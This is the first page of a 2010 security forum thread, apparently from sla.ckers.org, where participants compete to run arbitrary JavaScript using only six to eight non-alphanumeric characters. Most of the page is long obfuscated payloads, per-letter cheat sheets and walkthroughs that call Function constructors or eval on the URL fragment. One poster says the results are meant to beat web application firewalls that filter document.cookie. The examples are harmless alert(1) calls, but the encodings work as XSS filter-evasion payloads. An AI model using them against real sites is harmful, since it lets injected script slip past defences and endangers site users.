Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 123Next
Current Page: 1 of 3
YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: January 09, 2010 02:37AM

thornmaker and I think that the only chars we need to run arbitrary JS code are 8:

+![],()/

Can someone find a way to do eval(name) or location=.. or something with less chars (note that you can't use alnum chars..)?

If it is not possible, then, we made this PoC:

([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(!![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+[]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])]+(![]+[])[+!![]]+(![]+[])[!![]+!![]]](([]+([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(![]+[])[!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+!![]]])[(![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]]((+!![]/+([]+(+!![])+(+!![])+(+!![])+(+!![])+(+!![])+(+!![])+(+!![]))+[])[(+!![])+[]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])]+(!![]+!![]))+([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(![]+[])[!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+!![]]])

executing:

Quote

eval((''+location).slice(-2)+location)

so, a page with:

http://www.victim.com/#*/alert(1)//*

will execute the alert.

The rules are:
* Should work on any URL (you can optimize our code if you asume the URL length is constant).
* Should not use any other chars except from those 8.
* Should allow arbitrary code to be executed.
* Doesnt matter on which browser works.
* The winner is the one that gets it to work with 7 chars, or less. If no one gets it under 8, then the winner will be the shortest one from a set of non-alphanumeric 8



Ok.. so.. I have to go haha.. our code is 2084 chars long.. so let's see how can we make arbitrary code execute with the smaller set of chars possible.

Greetz!!

Btw, note that the smaller with alnum is also 8 chars: evalnm() haha

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 5 time(s). Last edit at 01/19/2010 08:24PM by sirdarckcat.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 09, 2010 08:02AM

Very nice idea - I love it hehe. Here's my approach - using seven characters which are:

()[]!+,

([],[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])()[([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+[])]+(![]+[])[+!![]+!![]]]('alert(1)')

I was too lazy to add the whole location stuff - just proving a point :P So - who can do it with six - and who can spot the trick to avoid usage of the slash? :P

Greetings,
.mario

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: thornmaker
Date: January 09, 2010 09:32AM

[].filter

clever :)



Edited 1 time(s). Last edit at 01/09/2010 09:32AM by thornmaker.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: thornmaker
Date: January 09, 2010 10:26AM

Here's a cheat sheet with the shortest version of each letter that I'm aware of, using only Mario's 7:
a:(![]+[])[+!![]+[]]
b:(([],[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])()+[])[+!![]+!![]+[]]
c:([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![]+!![])+(+[])]
d:([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![]+!![])+(+!![]+!![]+[])]
e:(!![]+[])[+!![]+!![]+!![]+[]]
f:(![]+[])[+[]]
g:
h:
i:([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]
j:(([],[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])()+[])[+!![]+!![]+!![]+[]]
k:
l:(![]+[])[+!![]+!![]+[]]
m:(([][(![]+[])[+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]+[]]+(!![]+[])[+[]]+(!![]+[])[+!![]+!![]+!![]+[]]+(!![]+[])[+!![]+[]]][([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![]+!![])+(+[])]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]+[]]+(!![]+[])[+!![]+!![]+[]]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![]+!![])+(+[])]+(!![]+[])[+[]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]+[]]])()+[])[+!![]+(+!![]+(+!![])+(+!![])+(+!![])+[])]
n:([][[]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]
o:([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]  
p:
q:
r:(!![]+[])[+!![]+[]]
s:(![]+[])[+!![]+!![]+!![]]
t:(!![]+[])[+[]]
u:(!![]+[])[+!![]+!![]+[]]
v:([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]
w:
x:
y:
z:


If nothing else, the ones which are missing can be obtained using btoa or atob... but it gets ugly. I'm sure many of these can be shortened too

[edit]: was originally using a forbidden char to get Infinity for i, n, and y. replaced with ([][[]]+[]) which gives undefined which gets the i and n. I also updated m to use ([].filter.constructor)()



Edited 5 time(s). Last edit at 01/10/2010 04:53PM by thornmaker.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: rvdh
Date: January 10, 2010 05:22AM

How about;

!{}+{} 		"false[object Object]"
!{}[{}]+{}	"true[object Object]"
!!{}+{}	        "true[object Object]"
{+{}+{}}	"NaN[object Object]"
!!{}/[]+[]      "Infinity"
etc...



Edited 4 time(s). Last edit at 01/10/2010 05:44AM by rvdh.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 10, 2010 06:39AM

Yes - but you would at least require 9 characters to have it executable. We need the ! to get to a true or false string. I tried to get rid of the comma but only managed to do it with the pipe character (+[]||[].sort)() ...

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 10, 2010 06:54AM

Yeah, actually the biggest problem we had was to avoid the use of {}, since we were only using it to get an o.. that's why we chose /, since we used it to do regexes, and then from the regexes get /./.test, but mario found .filter haha, and that's why he rocks so much haha.

So, now the contest applies to alnum and nonalnum! since apparently, with alnum we need 8 chars: eval(nm) to execute code.. is there any smaller alphanumeric set?

In any case haha.. this rocks :D, congrats mario!

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: thornmaker
Date: January 10, 2010 04:06PM

 ([].filter.constructor)() 
gives an m like so...

(([][(![]+[])[+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]+[]]+(!![]+[])[+[]]+(!![]+[])[+!![]+!![]+!![]+[]]+(!![]+[])[+!![]+[]]][([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![]+!![])+(+[])]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]+[]]+(!![]+[])[+!![]+!![]+[]]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![]+!![])+(+[])]+(!![]+[])[+[]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]+[]]])()+[])[+!![]+(+!![]+(+!![])+(+!![])+(+!![])+[])]

and uses 1363 characters which is roughly 300 chars shorter then using eval(btoa()). still a tricky letter



Edited 2 time(s). Last edit at 01/10/2010 04:53PM by thornmaker.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 10, 2010 04:42PM

Paving the way for eval(name) - sweet :)

Ah -and don't forget about [].filter.constructor('alert(1)')() - no comma - thus six characters :D



Edited 1 time(s). Last edit at 01/10/2010 04:45PM by .mario.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 10, 2010 05:08PM

Used characters:
()[]!+
Full PoC: [pastebin.com]

Walkthrough:
// code execution from string
//[].filter.constructor('alert(1)')()

// getting some characters from [].filter
//[][([][![]]+[])[4]+([][![]]+[])[5]+(![]+[])[2]+(!![]+[])[0]+(![]+[])[4]+(!![]+[])[1]]+[]

// getting 'constructor'
//([][([][![]]+[])[4]+([][![]]+[])[5]+(![]+[])[2]+(!![]+[])[0]+(![]+[])[4]+(!![]+[])[1]]+[])[3]+([][([][![]]+[])[4]+([][![]]+[])[5]+(![]+[])[2]+(!![]+[])[0]+(![]+[])[4]+(!![]+[])[1]]+[])[6]+([][([][![]]+[])[4]+([][![]]+[])[5]+(![]+[])[2]+(!![]+[])[0]+(![]+[])[4]+(!![]+[])[1]]+[])[7]+(![]+[])[3]+(!![]+[])[0]+(!![]+[])[1]+([][([][![]]+[])[4]+([][![]]+[])[5]+(![]+[])[2]+(!![]+[])[0]+(![]+[])[4]+(!![]+[])[1]]+[])[1]+([][([][![]]+[])[4]+([][![]]+[])[5]+(![]+[])[2]+(!![]+[])[0]+(![]+[])[4]+(!![]+[])[1]]+[])[3]+(!![]+[])[0]+([][([][![]]+[])[4]+([][![]]+[])[5]+(![]+[])[2]+(!![]+[])[0]+(![]+[])[4]+(!![]+[])[1]]+[])[6]+(!![]+[])[1]

// some quality digits
// 0=  +![]
// 1=  +!![]
// 2=  +!![]+!![]
// 3=  +!![]+!![]+!![]
// 4=  +!![]+!![]+!![]+!![]
// 5=  +!![]+!![]+!![]+!![]+!![]
// 6=  +!![]+!![]+!![]+!![]+!![]+!![]
// 7=  +!![]+!![]+!![]+!![]+!![]+!![]+!![]


// nailing it :D
[][([][![]]+[])[+!![]+!![]+!![]+!![]]+([][![]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+![]]+(![]+[])[+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]][([][([][![]]+[])[+!![]+!![]+!![]+!![]]+([][![]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+![]]+(![]+[])[+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]]+([][([][![]]+[])[+!![]+!![]+!![]+!![]]+([][![]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+![]]+(![]+[])[+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+([][([][![]]+[])[+!![]+!![]+!![]+!![]]+([][![]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+![]]+(![]+[])[+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]+!![]]+(!![]+[])[+![]]+(!![]+[])[+!![]]+([][([][![]]+[])[+!![]+!![]+!![]+!![]]+([][![]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+![]]+(![]+[])[+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]]+[])[+!![]]+([][([][![]]+[])[+!![]+!![]+!![]+!![]]+([][![]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+![]]+(![]+[])[+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]]+(!![]+[])[+![]]+([][([][![]]+[])[+!![]+!![]+!![]+!![]]+([][![]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+![]]+(![]+[])[+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]]('alert(1)')()

Greetings,
.mario



Edited 2 time(s). Last edit at 01/10/2010 05:55PM by .mario.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: rvdh
Date: January 10, 2010 05:33PM

@sirdarckcat

I'm totally not following all the progression on this, I just chirped in with an alternative scenario, not to make it smaller or anything, but just to post the idea of using objects as I didn't see it in here. I figured you'd understand without a 1 inch disclaimer.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: thornmaker
Date: January 10, 2010 06:27PM

@rvdh i got your alternative scenario. I'm not for sure how you would tie things together without parenthesis though. Can you get a reference to window or anonymous function using only those 7 chars? If so, you might have another set of 6 that would also work. I'm assuming you can get rid of / since i and n can be obtained from undefined == [][[]]+[].

@.mario awesome! Your full PoC using just []()!+ is 3768 chars. So the challenge remains to shorten to a set of 5 or find the shortest variation with 6 :)



Edited 1 time(s). Last edit at 01/10/2010 06:33PM by thornmaker.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 10, 2010 06:38PM

@.mario wow! haha that's sweeeet

I think the only way now to get it smaller would be changing () for =.. (location=something), since we mostly use () for grouping before concatenation, thing that can also be done with [], and to the final evaluation.. the only problem this has is the reference to window.. we need one (0..constructor.constructor.__parent__ is the best one I can think of, but we dont have _ right? anyway, 0..constructor.constructor.__parent__.location=javascript:eval(name) or something like that).

Now, we should send this to all those stupid wafs that filter document.cookie haha

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/10/2010 06:41PM by sirdarckcat.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: thornmaker
Date: January 10, 2010 08:26PM

Here's a shortened version using ()[]!+ chars:

PoC: http://pastebin.ca/1746352

Length: 2929

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 11, 2010 02:12AM

Ah - you found the overlong 15 and the 16 I hid for you :)

http://pastebin.ca/1746601 2926:P

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: thornmaker
Date: January 11, 2010 04:36PM

Here's an alternate version using 6...

Character set size: 6
Characters used: []()+=
Length: 4989
PoC: http://pastebin.ca/1747471 (yay for palindromes)
Notes: http://pastebin.ca/1747515

breakdown of chars:
      3 (
      3 )
   1114 +
    242 =
   1813 [
   1813 ]

Note that only 3 sets of () are used. One to get a reference to m and two to execute a string in [].filter.constructor()(). Also, = is only needed for references to true and false. Maybe it is possible to get true/false using only []=+

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: rvdh
Date: January 12, 2010 06:49AM

@thornmaker Yes I left the parenthesis out, of course on testing I use them. The idea wasn't to use less chars, only a different set of chars. :)

I wonder what else could be used besides arrays and objects? I fiddled with bitwise operators but no much luck so far.

Like:

Number    9:  ~{}+[~~{}]^[~{}]
Number    3:  ~{}+[~~{}]^[~{}]/~{}+[~~{}]^[~{}]
Number   -4: ~(~{}+[~~{}]^[~{}]/~{}+[~~{}]^[~{}])
Number 1014: ~{}+[~~{}]^[~{}]>>>~{}+[~~{}]^[~{}]

etc...



Edited 4 time(s). Last edit at 01/12/2010 10:50AM by rvdh.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 12, 2010 09:40AM

Here is how to get infinity with only =[]+

+[+[+[]==+[]][+[]]+[[[]+[][+[]]][+[]][+[+[]==+[]][+[]]+[+[]==+[]][+[]]+[+[]==+[]][+[]]]+[]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]]]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: rvdh
Date: January 12, 2010 11:05AM

Here is a simple incremental counter :)

_=+![]   // 0
_++
_++
_++
_       // 3 :)

or on one line:

1: _=[],_++,_
2: _=[],_++,_++,_
3: _=[],_++,_++,_++,_
4: _=[],_++,_++,_++,_++,_
5: _=[],_++,_++,_++,_++,_++,_



Edited 1 time(s). Last edit at 01/12/2010 05:46PM by rvdh.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: oxotnick
Date: January 12, 2010 12:00PM

It's possible to avoid logical not with increment/decrement:
1: ++[[]][+[]]
2: ++[[]][+[]]+(++[[]][+[]])
n: etc

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 12, 2010 02:03PM

@oxotnick

That's nice as it means I no longer need = for true :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 12, 2010 02:53PM

If you use spaces you can eliminate the () for incrementing:-

+[++[[]][+[]]]+ ++[[]][+[]]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/12/2010 02:53PM by Gareth Heyes.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 12, 2010 02:55PM

Here is infinity:-

+[++[[]][+[]]+[[][+[]]+[]][+[]][+[++[[]][+[]]]+ ++[[]][+[]]+ ++[[]][+[]]]+[++[[]][+[]]]+[++[[]][+[]]]+[++[[]][+[]]]+[++[[]][+[]]]]

Thanks to oxotnick for the number trick ++[[]][+[]]

Explanation:-
//1111:[++[[]][+[]]]+[++[[]][+[]]]+[++[[]][+[]]]+[++[[]][+[]]]
//undefined:[[][+[]]+[]][+[]]
//1:++[[]][+[]]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/12/2010 03:00PM by Gareth Heyes.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: oxotnick
Date: January 12, 2010 03:11PM

slightly modified Gareth's Infinity:

+[++[[]][+[]]+[[][+[]]+[]][+[]][++[++[++[[]][+[]]][+[]]][+[]]]+[++[[]][+[]]]+[++[[]][+[]]]+[++[[]][+[]]]+[++[[]][+[]]]]



Edited 1 time(s). Last edit at 01/12/2010 03:12PM by oxotnick.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 12, 2010 03:23PM

Nice!

We just need a _ using just []+

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/12/2010 03:24PM by Gareth Heyes.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: thornmaker
Date: January 12, 2010 04:49PM

